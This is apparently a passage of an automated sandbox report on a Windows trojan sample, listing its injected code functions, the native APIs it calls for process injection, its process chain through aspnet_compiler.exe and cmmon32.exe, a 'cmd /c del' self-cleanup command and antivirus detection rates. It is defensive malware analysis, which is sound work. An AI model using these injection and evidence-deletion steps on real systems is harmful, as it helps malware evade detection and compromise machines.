Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_0041BE42	1_2_0041BE42
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_0041C66C	1_2_0041C66C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_00402FB0	1_2_00402FB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_0041CFB5	1_2_0041CFB5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_01264120	1_2_01264120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_0124F900	1_2_0124F900
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_0131E824	1_2_0131E824
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_01301002	1_2_01301002
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_012720A0	1_2_012720A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_013120A8	1_2_013120A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_0125B090	1_2_0125B090
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_013128EC	1_2_013128EC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_01312B28	1_2_01312B28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_0127EBB0	1_2_0127EBB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_0130DBD2	1_2_0130DBD2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_013122AE	1_2_013122AE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_01240D20	1_2_01240D20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_01312D07	1_2_01312D07
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_01311D55	1_2_01311D55
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_01272581	1_2_01272581
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_0125D5E0	1_2_0125D5E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_013125DD	1_2_013125DD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_0125841F	1_2_0125841F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_0130D466	1_2_0130D466
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_01311FF1	1_2_01311FF1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_01266E30	1_2_01266E30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_0130D616	1_2_0130D616
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_01312EF7	1_2_01312EF7
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04A5841F	9_2_04A5841F
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04B0D466	9_2_04B0D466
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04A72581	9_2_04A72581
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04A5D5E0	9_2_04A5D5E0
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04B125DD	9_2_04B125DD
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04A40D20	9_2_04A40D20
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04B12D07	9_2_04B12D07
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04B11D55	9_2_04B11D55
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04B12EF7	9_2_04B12EF7
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04A66E30	9_2_04A66E30
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04B0D616	9_2_04B0D616
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04B11FF1	9_2_04B11FF1
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04A720A0	9_2_04A720A0
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04B120A8	9_2_04B120A8
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04A5B090	9_2_04A5B090
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04B128EC	9_2_04B128EC
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04B01002	9_2_04B01002
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04A64120	9_2_04A64120
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04A4F900	9_2_04A4F900
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04B122AE	9_2_04B122AE
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04A7EBB0	9_2_04A7EBB0
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04B0DBD2	9_2_04B0DBD2
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04B12B28	9_2_04B12B28
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_00B1C950	9_2_00B1C950
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_00B08C70	9_2_00B08C70
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_00B08C6B	9_2_00B08C6B
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_00B02D90	9_2_00B02D90
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_00B1C66C	9_2_00B1C66C
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_00B1BE42	9_2_00B1BE42
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_00B02FB0	9_2_00B02FB0
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_00B1CFB5	9_2_00B1CFB5

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: String function: 0124B150 appears 35 times
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: String function: 04A4B150 appears 35 times

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_004185D0 NtCreateFile,	1_2_004185D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_00418680 NtReadFile,	1_2_00418680
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_00418700 NtClose,	1_2_00418700
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_004187B0 NtAllocateVirtualMemory,	1_2_004187B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_004185CA NtCreateFile,	1_2_004185CA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_0041867A NtReadFile,	1_2_0041867A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_004186CB NtReadFile,	1_2_004186CB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_004187AA NtAllocateVirtualMemory,	1_2_004187AA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_01289910 NtAdjustPrivilegesToken,LdrInitializeThunk,	1_2_01289910
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_012899A0 NtCreateSection,LdrInitializeThunk,	1_2_012899A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_01289860 NtQuerySystemInformation,LdrInitializeThunk,	1_2_01289860
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_01289840 NtDelayExecution,LdrInitializeThunk,	1_2_01289840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_012898F0 NtReadVirtualMemory,LdrInitializeThunk,	1_2_012898F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_01289A20 NtResumeThread,LdrInitializeThunk,	1_2_01289A20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_01289A00 NtProtectVirtualMemory,LdrInitializeThunk,	1_2_01289A00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_01289A50 NtCreateFile,LdrInitializeThunk,	1_2_01289A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_01289540 NtReadFile,LdrInitializeThunk,	1_2_01289540
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_012895D0 NtClose,LdrInitializeThunk,	1_2_012895D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_01289710 NtQueryInformationToken,LdrInitializeThunk,	1_2_01289710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_012897A0 NtUnmapViewOfSection,LdrInitializeThunk,	1_2_012897A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_01289780 NtMapViewOfSection,LdrInitializeThunk,	1_2_01289780
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_01289FE0 NtCreateMutant,LdrInitializeThunk,	1_2_01289FE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_01289660 NtAllocateVirtualMemory,LdrInitializeThunk,	1_2_01289660
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_012896E0 NtFreeVirtualMemory,LdrInitializeThunk,	1_2_012896E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_01289950 NtQueueApcThread,	1_2_01289950
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_012899D0 NtCreateProcessEx,	1_2_012899D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_01289820 NtEnumerateKey,	1_2_01289820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_0128B040 NtSuspendThread,	1_2_0128B040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_012898A0 NtWriteVirtualMemory,	1_2_012898A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_01289B00 NtSetValueKey,	1_2_01289B00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_0128A3B0 NtGetContextThread,	1_2_0128A3B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_01289A10 NtQuerySection,	1_2_01289A10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_01289A80 NtOpenDirectoryObject,	1_2_01289A80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_01289520 NtWaitForSingleObject,	1_2_01289520
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_0128AD30 NtSetContextThread,	1_2_0128AD30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_01289560 NtWriteFile,	1_2_01289560
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_012895F0 NtQueryInformationFile,	1_2_012895F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_01289730 NtQueryVirtualMemory,	1_2_01289730
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_0128A710 NtOpenProcessToken,	1_2_0128A710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_01289760 NtOpenProcess,	1_2_01289760
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_01289770 NtSetInformationFile,	1_2_01289770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_0128A770 NtOpenThread,	1_2_0128A770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_01289610 NtEnumerateValueKey,	1_2_01289610
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_01289670 NtQueryInformationProcess,	1_2_01289670
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_01289650 NtQueryValueKey,	1_2_01289650
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_012896D0 NtCreateKey,	1_2_012896D0
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04A895D0 NtClose,LdrInitializeThunk,	9_2_04A895D0
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04A89540 NtReadFile,LdrInitializeThunk,	9_2_04A89540
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04A896E0 NtFreeVirtualMemory,LdrInitializeThunk,	9_2_04A896E0
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04A896D0 NtCreateKey,LdrInitializeThunk,	9_2_04A896D0
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04A89660 NtAllocateVirtualMemory,LdrInitializeThunk,	9_2_04A89660
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04A89650 NtQueryValueKey,LdrInitializeThunk,	9_2_04A89650
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04A89780 NtMapViewOfSection,LdrInitializeThunk,	9_2_04A89780
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04A89FE0 NtCreateMutant,LdrInitializeThunk,	9_2_04A89FE0
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04A89710 NtQueryInformationToken,LdrInitializeThunk,	9_2_04A89710
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04A89860 NtQuerySystemInformation,LdrInitializeThunk,	9_2_04A89860
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04A89840 NtDelayExecution,LdrInitializeThunk,	9_2_04A89840
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04A899A0 NtCreateSection,LdrInitializeThunk,	9_2_04A899A0
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04A89910 NtAdjustPrivilegesToken,LdrInitializeThunk,	9_2_04A89910
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04A89A50 NtCreateFile,LdrInitializeThunk,	9_2_04A89A50
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04A895F0 NtQueryInformationFile,	9_2_04A895F0
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04A89520 NtWaitForSingleObject,	9_2_04A89520
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04A8AD30 NtSetContextThread,	9_2_04A8AD30
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04A89560 NtWriteFile,	9_2_04A89560
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04A89610 NtEnumerateValueKey,	9_2_04A89610
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04A89670 NtQueryInformationProcess,	9_2_04A89670
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04A897A0 NtUnmapViewOfSection,	9_2_04A897A0
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04A89730 NtQueryVirtualMemory,	9_2_04A89730
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04A8A710 NtOpenProcessToken,	9_2_04A8A710
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04A89760 NtOpenProcess,	9_2_04A89760
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04A8A770 NtOpenThread,	9_2_04A8A770
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04A89770 NtSetInformationFile,	9_2_04A89770
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04A898A0 NtWriteVirtualMemory,	9_2_04A898A0
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04A898F0 NtReadVirtualMemory,	9_2_04A898F0
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04A89820 NtEnumerateKey,	9_2_04A89820
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04A8B040 NtSuspendThread,	9_2_04A8B040
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04A899D0 NtCreateProcessEx,	9_2_04A899D0
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04A89950 NtQueueApcThread,	9_2_04A89950
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04A89A80 NtOpenDirectoryObject,	9_2_04A89A80
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04A89A20 NtResumeThread,	9_2_04A89A20
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04A89A00 NtProtectVirtualMemory,	9_2_04A89A00
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04A89A10 NtQuerySection,	9_2_04A89A10
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04A8A3B0 NtGetContextThread,	9_2_04A8A3B0
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04A89B00 NtSetValueKey,	9_2_04A89B00
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_00B185D0 NtCreateFile,	9_2_00B185D0
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_00B18680 NtReadFile,	9_2_00B18680
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_00B187B0 NtAllocateVirtualMemory,	9_2_00B187B0
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_00B18700 NtClose,	9_2_00B18700
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_00B185CA NtCreateFile,	9_2_00B185CA
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_00B186CB NtReadFile,	9_2_00B186CB
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_00B1867A NtReadFile,	9_2_00B1867A
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_00B187AA NtAllocateVirtualMemory,	9_2_00B187AA

Source: jwRbEDUUZC.exe, 00000000.00000002.373152921.0000000000AE0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameResourceAssembly.dllD vs jwRbEDUUZC.exe
Source: jwRbEDUUZC.exe, 00000000.00000002.372873373.00000000000C4000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameREDDDGGDG.exe4 vs jwRbEDUUZC.exe
Source: jwRbEDUUZC.exe, 00000000.00000002.373209526.00000000023D9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameResourceAssembly.dllD vs jwRbEDUUZC.exe
Source: jwRbEDUUZC.exe, 00000000.00000002.373209526.00000000023D9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTHEDEVIL.dll2 vs jwRbEDUUZC.exe
Source: jwRbEDUUZC.exe, 00000000.00000002.373195688.00000000023C1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameResourceAssembly.dllD vs jwRbEDUUZC.exe
Source: jwRbEDUUZC.exe, 00000000.00000002.373182858.00000000023B1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameResourceAssembly.dllD vs jwRbEDUUZC.exe
Source: jwRbEDUUZC.exe, 00000000.00000002.374362164.00000000048A0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameTHEDEVIL.dll2 vs jwRbEDUUZC.exe
Source: jwRbEDUUZC.exe	Binary or memory string: OriginalFilenameREDDDGGDG.exe4 vs jwRbEDUUZC.exe

Source: jwRbEDUUZC.exe

Static PE information: invalid certificate

Source: jwRbEDUUZC.exe	Virustotal: Detection: 67%
Source: jwRbEDUUZC.exe	Metadefender: Detection: 31%
Source: jwRbEDUUZC.exe	ReversingLabs: Detection: 73%

Source: jwRbEDUUZC.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\jwRbEDUUZC.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\jwRbEDUUZC.exe "C:\Users\user\Desktop\jwRbEDUUZC.exe"
Source: C:\Users\user\Desktop\jwRbEDUUZC.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\cmmon32.exe C:\Windows\SysWOW64\cmmon32.exe
Source: C:\Windows\SysWOW64\cmmon32.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\jwRbEDUUZC.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmmon32.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"	Jump to behavior

Source: C:\Windows\explorer.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6C3EE638-B588-4D7D-B30A-E7E36759305D}\InprocServer32

Jump to behavior

Source: C:\Users\user\Desktop\jwRbEDUUZC.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\jwRbEDUUZC.exe.log

Jump to behavior

Source: classification engine

Classification label: mal100.troj.evad.winEXE@7/1@7/5

Source: jwRbEDUUZC.exe	Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
Source: C:\Users\user\Desktop\jwRbEDUUZC.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll			Jump to behavior

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6820:120:WilError_01

Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: C:\Users\user\Desktop\jwRbEDUUZC.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: jwRbEDUUZC.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: jwRbEDUUZC.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA

Source: jwRbEDUUZC.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: C:\Users\VICTOR\Downloads\Documents\CryptoObfuscator_Output\REDDDGGDG.pdb source: jwRbEDUUZC.exe
Source:	Binary string: cmmon32.pdb source: aspnet_compiler.exe, 00000001.00000002.458495887.0000000000DF9000.00000004.00000020.00020000.00000000.sdmp, aspnet_compiler.exe, 00000001.00000002.458328091.0000000000DD0000.00000040.10000000.00040000.00000000.sdmp
Source:	Binary string: cmmon32.pdbGCTL source: aspnet_compiler.exe, 00000001.00000002.458495887.0000000000DF9000.00000004.00000020.00020000.00000000.sdmp, aspnet_compiler.exe, 00000001.00000002.458328091.0000000000DD0000.00000040.10000000.00040000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: aspnet_compiler.exe, 00000001.00000003.372175294.0000000000EF0000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000001.00000003.374295618.0000000001082000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000001.00000002.459106369.000000000133F000.00000040.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000001.00000002.458723948.0000000001220000.00000040.00000800.00020000.00000000.sdmp, cmmon32.exe, 00000009.00000002.638425030.0000000004A20000.00000040.00000800.00020000.00000000.sdmp, cmmon32.exe, 00000009.00000003.459919139.0000000004889000.00000004.00000800.00020000.00000000.sdmp, cmmon32.exe, 00000009.00000003.458024904.00000000046F2000.00000004.00000800.00020000.00000000.sdmp, cmmon32.exe, 00000009.00000002.638599152.0000000004B3F000.00000040.00000800.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: aspnet_compiler.exe, aspnet_compiler.exe, 00000001.00000003.372175294.0000000000EF0000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000001.00000003.374295618.0000000001082000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000001.00000002.459106369.000000000133F000.00000040.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000001.00000002.458723948.0000000001220000.00000040.00000800.00020000.00000000.sdmp, cmmon32.exe, cmmon32.exe, 00000009.00000002.638425030.0000000004A20000.00000040.00000800.00020000.00000000.sdmp, cmmon32.exe, 00000009.00000003.459919139.0000000004889000.00000004.00000800.00020000.00000000.sdmp, cmmon32.exe, 00000009.00000003.458024904.00000000046F2000.00000004.00000800.00020000.00000000.sdmp, cmmon32.exe, 00000009.00000002.638599152.0000000004B3F000.00000040.00000800.00020000.00000000.sdmp
Source:	Binary string: THEDEVIL.pdb source: jwRbEDUUZC.exe, 00000000.00000002.373209526.00000000023D9000.00000004.00000800.00020000.00000000.sdmp, jwRbEDUUZC.exe, 00000000.00000002.374362164.00000000048A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: aspnet_compiler.pdb source: cmmon32.exe, 00000009.00000002.638909079.0000000004F57000.00000004.10000000.00040000.00000000.sdmp, cmmon32.exe, 00000009.00000002.634956986.0000000000CA4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: THEDEVIL.pdb89N9 @9_CorDllMainmscoree.dll source: jwRbEDUUZC.exe, 00000000.00000002.373209526.00000000023D9000.00000004.00000800.00020000.00000000.sdmp, jwRbEDUUZC.exe, 00000000.00000002.374362164.00000000048A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\Users\VICTOR\Downloads\Documents\CryptoObfuscator_Output\REDDDGGDG.pdbBSJB source: jwRbEDUUZC.exe

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_0041B87C push eax; ret	1_2_0041B882
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_0041B812 push eax; ret	1_2_0041B818
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_0041B81B push eax; ret	1_2_0041B882
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_0040D155 push ecx; ret	1_2_0040D156
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_00418A7B push ss; ret	1_2_00418A7F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 1_2_00416232 push 00000005h; retf	1_2_00416234
